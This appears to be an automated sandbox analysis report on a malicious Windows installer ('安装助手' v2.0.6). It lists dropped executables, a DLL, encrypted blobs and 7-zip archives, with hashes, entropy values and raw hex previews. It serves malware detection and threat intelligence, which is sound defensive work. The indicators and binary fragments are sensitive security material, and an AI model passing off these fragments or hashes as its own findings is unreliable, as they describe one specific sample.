                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Run name:Run with higher sleep bypass
Number of new started processes analysed:108
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Critical Process Termination
                    Sample name:#U5b89#U88c5#U52a9#U624b_2.0.6.exe
                    renamed because original name is a hash value
                    Original Sample Name:_2.0.6.exe
                    Detection:MAL
                    Classification:mal84.evad.winEXE@138/32@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 76%
                    • Number of executed functions: 28
                    • Number of non-executed functions: 77
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                    • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe
                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    No simulations
                    No context
                    No context
                    No context
                    No context
Match | Associated Sample Name / URL | Detection | Threat Name
Match: C:\Program Files (x86)\Windows NT\7zr.exe
  #U5b89#U88c5#U52a9#U624b_2.0.7.exe | malicious | Unknown
  #U5b89#U88c5#U52a9#U624b_2.0.7.exe | malicious | Unknown
  #U5b89#U88c5#U52a9#U624b_2.0.5.exe | malicious | Unknown
  #U5b89#U88c5#U52a9#U624b_2.0.4.exe | malicious | Unknown
  #U5b89#U88c5#U52a9#U624b_2.0.5.exe | malicious | Unknown
  #U5b89#U88c5#U52a9#U624b_2.0.4.exe | malicious | Unknown
  Zt43pLXYiu.exe | malicious | Unknown
  #U5b89#U88c5#U52a9#U624b_1.0.9.exe | malicious | Unknown
  Zt43pLXYiu.exe | malicious | Unknown
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):831200
                                      Entropy (8bit):6.671005303304742
                                      Encrypted:false
                                      SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                                      MD5:84DC4B92D860E8AEA55D12B1E87EA108
                                      SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                                      SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                                      SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious
• Filename: Zt43pLXYiu.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious
• Filename: Zt43pLXYiu.exe, Detection: malicious
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):249968
                                      Entropy (8bit):7.99927878301746
                                      Encrypted:true
                                      SSDEEP:6144:5MLDlV3MdqekCZrPDP+wYg19iyvziHx3WuJFK/iPon8JC:yLDX3Md2oDPJBiyvzsx35JcAEP
                                      MD5:E2189A19182C781773E5E291B61A5E47
                                      SHA1:3F47ADA8A171B2985DCE45E9534DC595D9215039
                                      SHA-256:AA6F63F4B8720AB33572ECB533359D255423003DC37C6D9C171EE20F9717A41B
                                      SHA-512:2329C8637E3AD42ACDE2E547D68315E9750A15D499E781F14051D067BB4913FBDFCA5507894025D8D3C3570A69CD3B438C75C951849392D5497A9AB775192360
                                      Malicious:false
                                      Preview:.@S.......q.,..............Ho..M....Z<..3 .hM.pV.j.8.+r@...l.q...o7&2.@L/..^:..B..E..}).\).4....?..A..U.<......=.:.kt.^n..b...M..8....g@..z..|.Om.....[%.|.<.hn....i....Q.\....2M.@........=.M..Vu......%]......}J..:H.Q.c.F.`..Y..u..^d...q...t...a&.3.9....C....g.qi.F.,Q.M..e.).5.#.|........u...K#.e....}.c..B..g6.......#*5...6.5....t....../Pb.".S....Vx.Z].0...U..K.L......9u.. k.....XM.;.....<#.....u.|...K.B,h.B..:..^1H:..c..*...B&.HC..W.j..A......i..T.3....Q...R.W..|..=.........*l.sz.B.F...........+./..Va.........y...%c<^r2.d...5...k.,....r.z.JuP.M.q.....&...2.*=7...X..x./....ck_<1f.OZ>5.......{N..{.....F..".$su..Q...}*!.....S.ZZ&O..J5&...|fv&.......s.y@..%...'wci..."I..-|.R..7)..j.....r..\.g...|..(."e)..^.`.b.....!.;.+.c..l.).|}.0.B.....4.]~...........U..r..7A..B..w.lUdx8..{y+tr.@...Q..4J6..(ZS.4x....MB.w..o..M..z..kw..s.{...W...6.L.|m.B.B..q..m.....4.#..I...mu. ...g#1f...B.(.Jj.#....+....D.{3......... "...../....^/A.4.V...,.%
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3598848
                                      Entropy (8bit):7.004949099807939
                                      Encrypted:false
                                      SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                      MD5:1D1464C73252978A58AC925ECE57F0FB
                                      SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                      SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                      SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 11%
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):5649408
                                      Entropy (8bit):6.392614480390128
                                      Encrypted:false
                                      SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                      MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                      SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                      SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                      SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):249968
                                      Entropy (8bit):7.99927878301746
                                      Encrypted:true
                                      SSDEEP:6144:5MLDlV3MdqekCZrPDP+wYg19iyvziHx3WuJFK/iPon8JC:yLDX3Md2oDPJBiyvzsx35JcAEP
                                      MD5:E2189A19182C781773E5E291B61A5E47
                                      SHA1:3F47ADA8A171B2985DCE45E9534DC595D9215039
                                      SHA-256:AA6F63F4B8720AB33572ECB533359D255423003DC37C6D9C171EE20F9717A41B
                                      SHA-512:2329C8637E3AD42ACDE2E547D68315E9750A15D499E781F14051D067BB4913FBDFCA5507894025D8D3C3570A69CD3B438C75C951849392D5497A9AB775192360
                                      Malicious:false
                                      Preview:.@S.......q.,..............Ho..M....Z<..3 .hM.pV.j.8.+r@...l.q...o7&2.@L/..^:..B..E..}).\).4....?..A..U.<......=.:.kt.^n..b...M..8....g@..z..|.Om.....[%.|.<.hn....i....Q.\....2M.@........=.M..Vu......%]......}J..:H.Q.c.F.`..Y..u..^d...q...t...a&.3.9....C....g.qi.F.,Q.M..e.).5.#.|........u...K#.e....}.c..B..g6.......#*5...6.5....t....../Pb.".S....Vx.Z].0...U..K.L......9u.. k.....XM.;.....<#.....u.|...K.B,h.B..:..^1H:..c..*...B&.HC..W.j..A......i..T.3....Q...R.W..|..=.........*l.sz.B.F...........+./..Va.........y...%c<^r2.d...5...k.,....r.z.JuP.M.q.....&...2.*=7...X..x./....ck_<1f.OZ>5.......{N..{.....F..".$su..Q...}*!.....S.ZZ&O..J5&...|fv&.......s.y@..%...'wci..."I..-|.R..7)..j.....r..\.g...|..(."e)..^.`.b.....!.;.+.c..l.).|}.0.B.....4.]~...........U..r..7A..B..w.lUdx8..{y+tr.@...Q..4J6..(ZS.4x....MB.w..o..M..z..kw..s.{...W...6.L.|m.B.B..q..m.....4.#..I...mu. ...g#1f...B.(.Jj.#....+....D.{3......... "...../....^/A.4.V...,.%
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):56530
                                      Entropy (8bit):7.99637651774541
                                      Encrypted:true
                                      SSDEEP:1536:QldiGQrAFpix02EAnKbWAjZSNFZaNkbVkZ:KdQSpixn0jZ8aNk2Z
                                      MD5:62408EF6D7BE391AF06FF367F7903B35
                                      SHA1:D2E8544834EAA45092C21ABDD35397F53A61BDF8
                                      SHA-256:583A6E6D26FD9D7D6975B554AC5D2CCD40CE043165DA10496BD816FD90A67BE3
                                      SHA-512:F7D4C73D4D2E6D77E1B7CAE1BB3D1BB5728EEDAD93F285B5CE4269F05D0BD18CD4D2A6B8E787BA4C4B68895829AB52794B76A75397FC9932675C4C27424FCB53
                                      Malicious:false
                                      Preview:.@S....K9..| ................W>.L.R.ap...-..E.t.r.p..k.....Kb.....G....3...93.....Q.FaG3..!K.ml=..AF?Q6.r....Hn]".;.....W....x.,...3-c..5.......Q.nU....F.D^z..........S.....e3....{.......K>........$r7.!...X..LL..L...(..h.._...`o<..;%3F.k.....).H........l..e..V=lp........3......"h...{..`@..b......T...2....../E.Jb....v..)...... .....a...zY.....+...A`../>....$....l.........}Y...h%6\..p.`((n.R...K...?2.Y..=..+..D.9.~.m23.6.-N2..6v..*........-G~23.W..!v .....y.X..hG".iw.;....TD....Z_Z. ..-..w$G....M.L......Nj..8......i.w.M.........4'UR.......@_L...6...@.%Y|5c...xX..4^.V...I..........]W. C...|..P.aka)B....R...N..=3z......^s..b[l.....d.7./...|....[}..vl....B..)U.o.......cIc`%..N5....^.q.46..IB(...5k....r`].W.i~.W.....&5..p(.....y%i....[.!..../.mU.h.H.=.....h....L^...9J~..d..}..L...u..8?.5...3l.u&.....>U......c=...4.|.YAI.J...G...7..l...ZZ.....P...4`.........q.....}#F.V.3V.....X....1.....c^.....na.P...f.XnT...I..S...:bH..".......%.k..{.v..:{M.-.(
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):56530
                                      Entropy (8bit):7.996376517745408
                                      Encrypted:true
                                      SSDEEP:768:5F38jWqODNfje3cm9SMYiRa8kvZLchG+VW2RmGoK8zgz/u2mf+gADbRfbfVx1T5L:nsjwdjex/YAa8kRSKgJdz/ugbRfbpeo
                                      MD5:3EE722D929C33891B48311FA072C2F9A
                                      SHA1:9FB8341A371FAAEC12868477C69DF5604733784A
                                      SHA-256:7CEB7F0967524EE351171162B79AD283D435BD0EDCE411FBFCE1B29421A4EB54
                                      SHA-512:6B4046540AE9B20699E0F8BE89558F52226F7297DAFB8810DF7812CD5429164C7AC8B689F51FDA3BE4EE374D5D86BCE0CAD9D1062066AB2C0FA577ACE5604B76
                                      Malicious:false
                                      Preview:7z..'......M........2............."...zI.r?.......pJ..8._...W.v-.9..8r{..J$M....h.`W.I.....6.....~m....8..WI5....c.jE.J4.6O+.+.[.B[|..?B?.&fu...'3.5..]CO .3....<T.+)..pN..6@..u`+.... H..D"....}..J.y...D0..m.j...z...%.a.a...*.|_.l..........9.wN.Mv....&:.iD.8[.bf.j.....j.(-1K....K~....O|...N...u..~..7s....C..d.js].=..U.S".Y...rD\7:j.].[....&,..u.LX`.s3.lJ..!.NR.Jv.G.:.....`@.Z.Z...`.......2...%qW..D.@..*..f.1.S.6......U..F2...n.c&...`qk....d.J....M....%...s.........XyW..)hq.....<..\0.]=..O.v2......}......a..~Zr1...V.C....~6.......+.b..;.q...bWy.R*...........j.x.0.RY...f@.j.....S....Y...;$S.<.......1..3..(1L..@.6#.R..zu......oT..L.d...E..:`.O..b..d1...[N.).i`.c........+......T.s.Q..]......`.G23..d....V.Whk.J..@(..Gjl2v ..SZPg.0...Ts....i......Y.w>.j|*:...t.L..o..i.^N.GEo.K...-`.V.K...Jjrpp.....f....a...1O...G..|{...;s..W....p....(.f......(...4ts(....[o..c....$-.@..*.MOB...[..e..s.`,....~..\...z...>...e..v]#...j.)9.1,q.'.A.K.I.E.....>...
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):56546
                                      Entropy (8bit):7.996966859255975
                                      Encrypted:true
                                      SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                      MD5:CEA69F993E1CE0FB945A98BF37A66546
                                      SHA1:7114365265F041DA904574D1F5876544506F89BA
                                      SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                      SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                      Malicious:false
                                      Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):56546
                                      Entropy (8bit):7.996966859255979
                                      Encrypted:true
                                      SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                      MD5:4CB8B7E557C80FC7B014133AB834A042
                                      SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                      SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                      SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                      Malicious:false
                                      Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):31890
                                      Entropy (8bit):7.99402458740637
                                      Encrypted:true
                                      SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                      MD5:8622FC7228777F64A47BD6C61478ADD9
                                      SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                      SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                      SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                      Malicious:false
                                      Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):31890
                                      Entropy (8bit):7.99402458740637
                                      Encrypted:true
                                      SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                      MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                      SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                      SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                      SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                      Malicious:false
                                      Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):74960
                                      Entropy (8bit):7.99759370165655
                                      Encrypted:true
                                      SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                      MD5:950338D50B95A25F494EE74E97B7B7A9
                                      SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                      SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                      SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                      Malicious:false
                                      Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):74960
                                      Entropy (8bit):7.997593701656546
                                      Encrypted:true
                                      SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                      MD5:059BA7C31F3E227356CA5F29E4AA2508
                                      SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                      SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                      SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                      Malicious:false
                                      Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):29730
                                      Entropy (8bit):7.994290657653607
                                      Encrypted:true
                                      SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                      MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                      SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                      SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                      SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                      Malicious:false
